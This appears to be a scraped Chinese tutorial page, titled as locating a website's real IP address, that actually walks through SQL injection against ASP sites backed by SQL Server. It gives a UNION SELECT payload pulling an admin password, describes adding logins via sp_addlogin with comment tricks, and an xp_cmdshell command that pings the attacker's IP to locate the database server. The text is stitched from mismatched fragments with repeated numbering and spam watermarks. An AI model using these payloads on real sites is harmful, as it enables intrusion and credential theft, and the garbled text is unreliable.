首页 > 电脑专区 > 电脑教程 >

如何渗透网站的相关真实IP地址

来源:互联网 2023-02-21 17:52:49 142

你可以用它们来建立 OLE 物件(一般COM 物件就可以了,但要支援 IDispatch 介面),执行物件的方法,读取与修改属性,进行错误处理。但它们无法回应一般 OLE 或 COM 物件的事件。有了 COM/OLE 物件的建立与执行,对於控制系统来说可算是如虎添翼,无所不能了。稍举个例子,我们可以利用它来取得有兴趣的网页的原始码492办公区 - 实用经验教程分享!

如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

工具/原料

  • 1
  • 1

方法/步骤

  • 1

    很显然,数据库中的第一个“login_name”为neo。看看他的密码是什么:  http://jsw/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neoMicrosoft OLE DB Provider for ODBC Drivers error ’80040e07’[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ’pilv’ to a column of data type int.  /index.asp, line 5 492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 1该信息非法爬取自百度经验
  • 2

    也就是说我们可以提交一些非法的值给这个ASP脚本,使它执行我们想要的SQL语句。  下面我用一个攻击过程来说明SQL injection的利用方法。  在使用SQL injection攻击的时候,我们首先要得到目标数据库的结构,提交 492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 3

    呵呵,你的_blank">防火墙该发出警告了,有人连接你的445或139(win9端口了,这样,对方的SQL的ip一样也可以暴露,其实backuo database到你的硬盘还是有点夸张了,如果对方数据库很庞大,你又是拨号上网,呵呵,劝你别试了,很难成功传输的。492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 1

    我在这里就不多说了。需要指明的是这种攻击方法的前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。    以后我们会讨论,如果对方的ASP不是用SQL管理员账号的时候,我们应该如何攻击。 492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 2

    如果_blank">防火墙提示有人ping你,那么因该可以肯定对方的ASP用的是SQL的管理员权限,同时也确定了对方的SQL Server的准确位置,因为很多大一点的网站考虑性能,会吧web服务和数据库分开,当对方大上了补丁看不到源代码时,我想只有这个方法能很快的定位对方的SQL Server的位置了 492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 3

    后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!  如何判断我们的命令是否成功执行了呢?我们先装一个_blank">防火墙,打开ICMP和139TCP和445TCP的警告提示然后提交  news.asp?id=2;exec master.dbo.xp_cmdshell ’ping 你的IP’ 492办公区 - 实用经验教程分享!

    如何渗透网站的相关真实IP地址492办公区 - 实用经验教程分享!

  • 注意事项

    • 喜欢点赞
    • 1

    以上方法由办公区教程网编辑摘抄自百度经验可供大家参考!492办公区 - 实用经验教程分享!


    标签: 操作系统渗透相关真实地址

    办公区 Copyright © 2016-2023 www.bgqu.net. Some Rights Reserved. 备案号:湘ICP备2020019561号统计代码